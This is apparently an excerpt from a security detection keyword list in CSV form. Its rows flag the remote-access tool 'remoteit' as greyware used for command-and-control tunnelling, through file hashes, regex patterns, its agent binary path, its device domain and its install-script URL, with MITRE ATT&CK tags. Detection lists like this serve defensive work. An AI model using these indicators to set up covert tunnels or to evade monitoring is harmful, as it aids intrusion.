"*b582450f8aea64cf41134d657ff610825080ddb317b7cbc1f1c1f1e4dd2c1978*",".{0,1000}b582450f8aea64cf41134d657ff610825080ddb317b7cbc1f1c1f1e4dd2c1978.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*b64d241702d0970bca644bf2d2f90155cf12f0265cd43377e58e5bb4f54c487f*",".{0,1000}b64d241702d0970bca644bf2d2f90155cf12f0265cd43377e58e5bb4f54c487f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*b70a71c6d30d106c21cdfcd3d7bf61f8eff05d28d22538c6ea335e9818999cb5*",".{0,1000}b70a71c6d30d106c21cdfcd3d7bf61f8eff05d28d22538c6ea335e9818999cb5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*b754705e934ef0766078f0371a1e83007dc7c85ef02ccd72da4571736df1914a*",".{0,1000}b754705e934ef0766078f0371a1e83007dc7c85ef02ccd72da4571736df1914a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*bb016f6b3e240b6447a72b15b103d32b8239969ac4493b8522b4f22b21f9440c*",".{0,1000}bb016f6b3e240b6447a72b15b103d32b8239969ac4493b8522b4f22b21f9440c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*bb136a7de55ce17c6a4fd59319a724f80e53a89d0896675cdd78f98cc7bc7858*",".{0,1000}bb136a7de55ce17c6a4fd59319a724f80e53a89d0896675cdd78f98cc7bc7858.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*bce4fa4709599a20156a3ee315899a479e28eead968db5af6199bffc7288d256*",".{0,1000}bce4fa4709599a20156a3ee315899a479e28eead968db5af6199bffc7288d256.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*bd07ae00c8a28ce61d06fb344b8d646696ac3a9eba79b0df1612736009b7c509*",".{0,1000}bd07ae00c8a28ce61d06fb344b8d646696ac3a9eba79b0df1612736009b7c509.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*bd313c0a5313c056ecaabdb990ed5077602f6e97e0c57b2e21a643b06d211eb8*",".{0,1000}bd313c0a5313c056ecaabdb990ed5077602f6e97e0c57b2e21a643b06d211eb8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*bd6f80e0290c96f73f6cb4837e0050dd4f66c71cdca9da9afde6a619b4c09f11*",".{0,1000}bd6f80e0290c96f73f6cb4837e0050dd4f66c71cdca9da9afde6a619b4c09f11.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*be4d5112b9928f8c5dbb51c2e67163fb82fed8abdda5b75ffafeff43b96fc8c0*",".{0,1000}be4d5112b9928f8c5dbb51c2e67163fb82fed8abdda5b75ffafeff43b96fc8c0.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*bf33607b1f28707326ad3cda5bdd5d729e28b7c826db8c7c2affa68adf5f50b5*",".{0,1000}bf33607b1f28707326ad3cda5bdd5d729e28b7c826db8c7c2affa68adf5f50b5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*bf8b63373a944d43c2c3c9b4c768cbff723526d25f40e5548e47318c7ec1b674*",".{0,1000}bf8b63373a944d43c2c3c9b4c768cbff723526d25f40e5548e47318c7ec1b674.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c13136af014ba278cfd9f3a3ba1d9fd4e1996c72d32c068c3b259a8c5930e1d8*",".{0,1000}c13136af014ba278cfd9f3a3ba1d9fd4e1996c72d32c068c3b259a8c5930e1d8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c1b657c2bb9c1713b0a4a6b5eea12df8b16dc1e82d1655215573575bf5a710d3*",".{0,1000}c1b657c2bb9c1713b0a4a6b5eea12df8b16dc1e82d1655215573575bf5a710d3.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c1b73bfeb5933efe372525bb800f452e335247cec34ef4ca214069cf83928e45*",".{0,1000}c1b73bfeb5933efe372525bb800f452e335247cec34ef4ca214069cf83928e45.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c269975b163143664260be837652e7163d150453b35f1d97abeadb31c9e47d66*",".{0,1000}c269975b163143664260be837652e7163d150453b35f1d97abeadb31c9e47d66.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c3bdcbd3ee63b0ff732b9027161d0e75550783a2285f36ae0b3940886f3fc1d7*",".{0,1000}c3bdcbd3ee63b0ff732b9027161d0e75550783a2285f36ae0b3940886f3fc1d7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c477182f8337d9b0ceb73fa2de3f0384a7781caa47bf33845ea7552746e6df65*",".{0,1000}c477182f8337d9b0ceb73fa2de3f0384a7781caa47bf33845ea7552746e6df65.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c4b51b5bdd584b2901180946bd0325d1673110a9f6f2050f522404a280bc2d3b*",".{0,1000}c4b51b5bdd584b2901180946bd0325d1673110a9f6f2050f522404a280bc2d3b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c4c77cda828b390796df90293a7595b030a9966af3804451295766b2d6d57a31*",".{0,1000}c4c77cda828b390796df90293a7595b030a9966af3804451295766b2d6d57a31.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c5baab0546d6a6f34ef0b571c8d16df52e8ea3093515986ae3eee3755683546a*",".{0,1000}c5baab0546d6a6f34ef0b571c8d16df52e8ea3093515986ae3eee3755683546a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c5d0c469b322039c20ffdbbc052083c342a0c1b9b2b16b47be469e0da76fb3f1*",".{0,1000}c5d0c469b322039c20ffdbbc052083c342a0c1b9b2b16b47be469e0da76fb3f1.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c8a0f709cf4759d81ced139804cd7f790590fea22b34e00a7abe57431fb8525c*",".{0,1000}c8a0f709cf4759d81ced139804cd7f790590fea22b34e00a7abe57431fb8525c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c9192193554c131a5f3c8dcdc1764bae1705583f853f302d48185128fdf7594c*",".{0,1000}c9192193554c131a5f3c8dcdc1764bae1705583f853f302d48185128fdf7594c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c9cc2b7d5ff7a0f9f7b97da9bf4a090bfd323be51bda6c12eb2b01c9efa816b5*",".{0,1000}c9cc2b7d5ff7a0f9f7b97da9bf4a090bfd323be51bda6c12eb2b01c9efa816b5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*c9f5f2d7fae73dc38b27872ccb37559f5a7dd96b15b48c6e54bd6a5640d852e2*",".{0,1000}c9f5f2d7fae73dc38b27872ccb37559f5a7dd96b15b48c6e54bd6a5640d852e2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*ca8a4d90295fa5049d85ac5b867861ec4740f64f5f3061a1c0308d2a041dbf2b*",".{0,1000}ca8a4d90295fa5049d85ac5b867861ec4740f64f5f3061a1c0308d2a041dbf2b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*ca9099738d41c98fa1f8fe983cbc9071e37af846c851311316ee8b38c2cb5706*",".{0,1000}ca9099738d41c98fa1f8fe983cbc9071e37af846c851311316ee8b38c2cb5706.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*cb923918ef4e035f3ac3c144792f3d20e5519741c4e1f56ff9bee53f6cd4592c*",".{0,1000}cb923918ef4e035f3ac3c144792f3d20e5519741c4e1f56ff9bee53f6cd4592c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*cc5604a463e90dd1da595a73e2fd9e0282a465fe7cd41f46e34ed05a7b84b295*",".{0,1000}cc5604a463e90dd1da595a73e2fd9e0282a465fe7cd41f46e34ed05a7b84b295.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*cd386a8883d2da370ccf24b6b29313bd58510ab87bce674ede931eb1310b153f*",".{0,1000}cd386a8883d2da370ccf24b6b29313bd58510ab87bce674ede931eb1310b153f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*ce9bd575dccf2e5b373d8f7b1aca7cfdbf6d9a4e9179a24ac6d92914b3f782d4*",".{0,1000}ce9bd575dccf2e5b373d8f7b1aca7cfdbf6d9a4e9179a24ac6d92914b3f782d4.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*connectd/usr/bin/connectd_d2d*",".{0,1000}connectd\/usr\/bin\/connectd_d2d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*d0a44c5acf4946e913a8534d362d681bd50205d00549d3db028d8ce2802e9b86*",".{0,1000}d0a44c5acf4946e913a8534d362d681bd50205d00549d3db028d8ce2802e9b86.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*d11fdf3e02243a642c2158357522d457d4111058723c5ce79c355c40b4495350*",".{0,1000}d11fdf3e02243a642c2158357522d457d4111058723c5ce79c355c40b4495350.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*d1455ccf2efda304183873600535c73e8205663b384ec30a8c9f2e6ecd0a91b0*",".{0,1000}d1455ccf2efda304183873600535c73e8205663b384ec30a8c9f2e6ecd0a91b0.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*d1905784a1ef416d990ea8cbe68e0af88e2d33a4b2a8b5f9a75e056405a7dcb5*",".{0,1000}d1905784a1ef416d990ea8cbe68e0af88e2d33a4b2a8b5f9a75e056405a7dcb5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*d34833e0daa78c9a9a36b3ff311596ec7d010afa18d95ca02fc6ee577630d81a*",".{0,1000}d34833e0daa78c9a9a36b3ff311596ec7d010afa18d95ca02fc6ee577630d81a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*d3f7f5fce71cbd20a86771949c9fe143cf4732f69db1cd9beaafd6a6a9de795b*",".{0,1000}d3f7f5fce71cbd20a86771949c9fe143cf4732f69db1cd9beaafd6a6a9de795b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*d57bf75bc694c0f583e9e23acee5dc35a2ab719a842adb52008ed494d0cd5979*",".{0,1000}d57bf75bc694c0f583e9e23acee5dc35a2ab719a842adb52008ed494d0cd5979.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*d6e5f1a398a35682f888bbce3b6187389d845778327479fb80091cd7ffcf78c7*",".{0,1000}d6e5f1a398a35682f888bbce3b6187389d845778327479fb80091cd7ffcf78c7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*d810084b9bb4b7c552be24f744165d6a46d777d39bf36f3a5951df7108b77437*",".{0,1000}d810084b9bb4b7c552be24f744165d6a46d777d39bf36f3a5951df7108b77437.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*d8289c3873b04fe89664452f40f859431572e3417ef3fc102d7eacf8f8b288cf*",".{0,1000}d8289c3873b04fe89664452f40f859431572e3417ef3fc102d7eacf8f8b288cf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*d9d826b12867990006f7a5bc6f015d0effde87b65427c0a3f7b23370314ad16f*",".{0,1000}d9d826b12867990006f7a5bc6f015d0effde87b65427c0a3f7b23370314ad16f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*daabc151e0d5a6436c71bceedf79759369a11edb7fc75a2dd9b2f32098ac2b65*",".{0,1000}daabc151e0d5a6436c71bceedf79759369a11edb7fc75a2dd9b2f32098ac2b65.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*dab18572b7ed5e6c70ae7e1973a6af974aed0ab30bed7d385a92ae7cc22851ac*",".{0,1000}dab18572b7ed5e6c70ae7e1973a6af974aed0ab30bed7d385a92ae7cc22851ac.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*db8f43c3b82fa1517800e8672750708886820c4eafe4d72f96773898ad996588*",".{0,1000}db8f43c3b82fa1517800e8672750708886820c4eafe4d72f96773898ad996588.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*db9fe305a4ca18b39e80a2b5bf0f6ea32bf41b968798897703647bbeb39e11f7*",".{0,1000}db9fe305a4ca18b39e80a2b5bf0f6ea32bf41b968798897703647bbeb39e11f7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*dbe984e84ff23af911cf29adb0c3f9fe665f873708b5937a44b156846029a43f*",".{0,1000}dbe984e84ff23af911cf29adb0c3f9fe665f873708b5937a44b156846029a43f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*dbf767a606cbb7c653296843204fe570a8b59b622faa3315ecf555ecc6e0803f*",".{0,1000}dbf767a606cbb7c653296843204fe570a8b59b622faa3315ecf555ecc6e0803f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*dc42d5e6752383656c1cc05459bd10dd9f6a25c3c715a38d1c14dc0391a00982*",".{0,1000}dc42d5e6752383656c1cc05459bd10dd9f6a25c3c715a38d1c14dc0391a00982.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*de4038e39b557638be260ddeb85bf3e6e806aef81ac07b681b0303414baf99bd*",".{0,1000}de4038e39b557638be260ddeb85bf3e6e806aef81ac07b681b0303414baf99bd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*deda21817db09e3239b1cd5be4b8bfdeb8a603a285b72169927c246970b99b00*",".{0,1000}deda21817db09e3239b1cd5be4b8bfdeb8a603a285b72169927c246970b99b00.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*device.remote.it*",".{0,1000}device\.remote\.it.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*downloads.remote.it/remoteit/install_agent.sh*",".{0,1000}downloads\.remote\.it\/remoteit\/install_agent\.sh.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*e1ff5a314c147e1e6d7e7ae3d302cc0b1734a4e8aa20d35d2c3e786b1438e164*",".{0,1000}e1ff5a314c147e1e6d7e7ae3d302cc0b1734a4e8aa20d35d2c3e786b1438e164.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*e2a5be5bc8d923fb310f98b974e5dcfe0c308dedd9efe931923793ad7bdace9e*",".{0,1000}e2a5be5bc8d923fb310f98b974e5dcfe0c308dedd9efe931923793ad7bdace9e.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*e2cbbea92145e924cec43ae92bbb865aa3b31e5323af273724ab2a56cf01e972*",".{0,1000}e2cbbea92145e924cec43ae92bbb865aa3b31e5323af273724ab2a56cf01e972.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*e4b62f88bc61b3a1ef4cc83ba6aebefefec75ab246d83e8708c3cf1c8c3240b4*",".{0,1000}e4b62f88bc61b3a1ef4cc83ba6aebefefec75ab246d83e8708c3cf1c8c3240b4.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*e4c382716cdf1d4d582eb2ac3279f498c8e335d119737fa390a766296738ee87*",".{0,1000}e4c382716cdf1d4d582eb2ac3279f498c8e335d119737fa390a766296738ee87.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*e7b060f41a2322c481867f623ee711a321d6fb554fe816251f1381d1669a68c8*",".{0,1000}e7b060f41a2322c481867f623ee711a321d6fb554fe816251f1381d1669a68c8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*e7f39694ec1f97181d17f0f9b8fbad820c5bc98289602f7a960916142596c4b3*",".{0,1000}e7f39694ec1f97181d17f0f9b8fbad820c5bc98289602f7a960916142596c4b3.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*e9cbf615487a666b2fe9c5b7c749fa91d4af0454bd368f4f3275148609f553bf*",".{0,1000}e9cbf615487a666b2fe9c5b7c749fa91d4af0454bd368f4f3275148609f553bf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*ea178a3f4a3bf35c1998533cac58f1bf5fb90ddca42540d29d8efc1e93480bb9*",".{0,1000}ea178a3f4a3bf35c1998533cac58f1bf5fb90ddca42540d29d8efc1e93480bb9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
